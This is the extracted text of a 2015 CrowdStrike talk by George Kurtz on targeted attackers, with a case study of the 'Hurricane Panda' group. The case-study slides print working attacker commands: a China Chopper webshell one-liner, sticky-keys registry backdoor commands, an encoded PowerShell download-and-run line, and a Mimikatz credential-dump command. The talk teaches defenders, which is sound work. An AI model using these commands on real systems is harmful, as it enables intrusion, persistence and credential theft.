hand-to-hand combat with a targeted attacker€¦ · hand-to-hand combat with a targeted attacker...
TRANSCRIPT
HAND-TO-HAND COMBAT WITH A TARGETED ATTACKER
GEORGE KURTZ, CEO & CO-FOUNDER
THE GAP OF SECURITY
A Little About Me…
2014 CrowdStrike, Inc. All rights reserved. 2
GEORGE KURTZ | PRESIDENT/CEO & CO-FOUNDER
CrowdStrike
Serial Entrepreneur Author, entrepreneur, and speaker with 23 years in the security space
Prior to CrowdStrike WW CTO and GM, as well as SVP of Enterprise at McAfee. Founder & CEO of Foundstone (acquired by McAfee in 2004)
www.hackingexposed7.com @George_Kurtz
3
CrowdStrike is a pioneer in next-generation endpoint protection,
threat intelligence, and Pre / Post Response Services
2014 CrowdStrike, Inc. All rights reserved.
WHO IS CROWDSTRIKE?
Trusted by some of the largest blue chip companies and three out
of four of the top government agencies in the world
Lead by security experts and industry veterans with over 200 years of
relevant experience
Founded 2011
AGENDA Current State of In-Security CASE STUDY: Who is Hurricane Panda? Take-aways
2015 CrowdStrike, Inc. All rights reserved.
2014 CrowdStrike, Inc. All rights reserved. 5
69%
2014 CrowdStrike, Inc. All rights reserved. 6
200+
Days
2014 CrowdStrike, Inc. All rights reserved. 7
$7.6M
2014 CrowdStrike, Inc. All rights reserved. 8
$214
2014 CrowdStrike, Inc. All rights reserved. 9
40%
Terrorists
Cybercriminals
Commercial Enterprises
Hacktivists/Vigilantes
Nation-States
WHY IS THIS HAPPENING - THE GAP
THREAT SOPHISTICATION
CA
PA
BIL
ITY
FO
R D
AM
AG
E
AB
ILIT
Y T
O P
RE
VE
NT
OPPORTUNISTIC ACTORS
DETERMINED ACTORS
40%
THE
GAP
TODAY’S
HEADLINES
>>
>>
REAL
FINANCIAL
IMPACT OF
IP THEFT
Nearly $1B loss in market cap overnight from a targeted attack!
WHAT ORGANIZATIONS CAN DO TODAY
Destroy & Dump - The New Reality
2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
MAGINOT LINE IS NOT WORKING
16
ENDPOINT
NETWORK
WEB/MAIL
Opportunistic
Opportunistic Targeted
Targeted
DEFENSE
IN DEPTH IS
SILENTLY
FAILING AGAINST
DETERMINED
ADVERSARIES
2015 CrowdStrike, Inc. All rights reserved.
ORGANIZATIONS
BELIEVE THEY HAVE
A MALWARE PROBLEM
2015 CrowdStrike, Inc. All rights reserved.
A MALWARE PROBLEM
ORGANIZATIONS
BELIEVE THEY HAVE
AN ADVERSARY PROBLEM
2015 CrowdStrike, Inc. All rights reserved.
2015 CrowdStrike, Inc. All rights reserved. 19
ADVANCED ATTACKERS EVADE traditional defenses and destroy today’s networks
2015 CrowdStrike, Inc. All rights reserved. 20
Comment Panda: Commercial, Government, Non-profit
Deep Panda: Financial, Technology, Non-profit
Foxy Panda: Technology & Communications
Anchor Panda: Government organizations, Defense & Aerospace, Industrial Engineering, NGOs
Hurricane Panda: Telecommunications Sector
Impersonating Panda: Financial Sector
Karma Panda: Dissident groups
Keyhole Panda: Electronics & Communications
Poisonous Panda: Energy Technology, G20, NGOs, Dissident Groups
Putter Panda: Governmental & Military
Toxic Panda: Dissident Groups
Union Panda: Industrial companies
Vixen Panda: Government
CHINA
IRAN
INDIA
Viceroy Tiger: Government, Legal, Financial, Media, Telecom
RUSSIA
Energetic Bear: Oil and Gas Companies
NORTH KOREA
Silent Chollima: Government, Military, Financial
Magic Kitten: Dissidents
Cutting Kitten: Energy Companies
Singing Spider: Commercial, Financial
Union Spider: Manufacturing
Andromeda Spider: Numerous
CRIMINAL
Deadeye Jackal: Commercial, Financial,
Media, Social Networking
Ghost Jackal: Commercial, Energy,
Financial
Corsair Jackal: Commercial, Technology,
Financial, Energy
Extreme Jackal: Military, Government
HACKTIVIST/TERRORIST
Understanding the “Who” behind these attacks
2015 CrowdStrike, Inc. All rights reserved. 21
WHEN PANDAS ATTACK… MALWARE FREE INTRUSIONS
2015 CrowdStrike, Inc. All rights reserved. 22
WHO IS HURRICANE
PANDA?
Operational Window: Late 2013 – Present
Targeting: Telecommunications & Technology
Objectives: Recon, Lateral Movement, IP Theft
Locations: United States, Japan
Tools: Chopper Webshell, PlugX, HiKit
Capabilities:
Theft of Signing Certificates: Used to sign malware to help
evade detection
Remote Access Tools: Use of malware and webshells for
remote access
Escalation: Privileges and lateral movement with credential
dumping tools
Exfil: Usage of FTP to send data out of an organization
2015 CrowdStrike, Inc. All rights reserved. 23
THE ATTACK…
2015 CrowdStrike, Inc. All rights reserved. 24
ADVERSARY ACTIVITIES
REMAINED UNDETECTED
FOR OVER ONE YEAR.
2015 CrowdStrike, Inc. All rights reserved. 25
Chopper webshell:
<%@Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
GAIN ACCESS
MAINTAIN PERSISTENCE
DUMP CREDENTIALS
SECURITY CHALLENGE: DETECTING & STOPPING A 72 BYTE BACKDOOR
WRITTEN TO A WEBSERVER USING AN ARBITRARY FILE
WRITE
2014 CrowdStrike, Inc. All rights reserved. 26
Registry command for the debugger hack (if done locally): reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ
/d "cmd.exe" /f
Registry command for the debugger hack (if done remotely using WMI): wmic /user:<REDACTED> /password:<REDACTED> /node:<REDACTED> process call create "C:\Windows\system32\reg.exe add
\"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d
\"cmd.exe\" /f"
GAIN ACCESS
MAINTAIN PERSISTENCE
DUMP CREDENTIALS
SECURITY CHALLENGE: DETECTING PERSISTENCE THAT DOESN’T RELY ON A
BINARY EXECUTABLE & BYPASSES THE LOGIN
PROCESS 2015 CrowdStrike, Inc. All rights reserved. 26
STICKY KEYS IN ACTION
2015 CrowdStrike, Inc. All rights reserved. 27
BEFORE
LOGGING IN THE ATTACKER
HAS FULL SYSTEM
PRIVILEGES WITH
A COMMAND
PROMPT WINDOW
2014 CrowdStrike, Inc. All rights reserved. 28
Using base64 Encoded Commands into Powershell:
GAIN ACCESS
MAINTAIN PERSISTENCE
DUMP CREDENTIALS
powershell -windowStyle hidden -ExecutionPolicy ByPass -encodedCommand
DQAKAA0ACgBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMA
dAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4A
ZwAoACcAaAB0AHQAcAA6AC8ALwBpAHMALgBnAGQALwBvAGUAbwBGAHUASQAnACkAOwAgAEkAbgB2AG8A
awBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwAiACAAPgAgAEMAOgBcAHUA
cwBlAHIAcwBcAGEALgB0AHgAdAANAAoAIAAgACAAIAANAAoA
SECURITY CHALLENGE: DETECTING PRIVILEGE ESCALATION & LATERAL
MOVEMENT THAT RELIES ON MEMORY-BACKED FILES
Real commands evading traditional defenses:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://<REDACTED>'); Invoke-Mimikatz
-DumpCreds" > C:\users\a.txt
2015 CrowdStrike, Inc. All rights reserved. 28
INDICATORS OF COMPROMISE VS. INDICATORS OF ATTACK -
TRANSFORMATIONAL
2015 CrowdStrike, Inc. All rights reserved. 29
Need to look out the windshield
– not drive in the rear view mirror
REACTIVE INDICATORS
OF COMPROMISE
VS
PROACTIVE
INDICATORS OF
ATTACK
IOCs
Malware, Signatures,
Exploits,
Vulnerabilities,
IP Addresses
IOAs
Code Execution,
Persistence, Stealth,
Command & Control,
Lateral Movement
2015 CrowdStrike, Inc. All rights reserved. 30
SECURITY
TEAMS
MUST ADJUST
& GO REAL-
TIME
New Detection Methods:
• Must be real-time or rear real-time
• Sweeping just for IOCs is a losing
proposition
• Must detect credential theft as it
happens
• Manage privilege accounts
• 24x7 Managed Services to aid in
detection & containment
REMEMBER: What happens in a virtual container is NOT what happens on your endpoints
“if you no longer go for a
gap that exists, you are no
longer a racing driver
because we are competing, we
are competing to win”
AYRTON Senna – F1 Driver & Champion
2014 CrowdStrike, Inc. All rights reserved. 31
“if you no longer go for a
gap that exists in your
victim, you are no longer a
true adversary”
-Bad guy inc.-
Questions?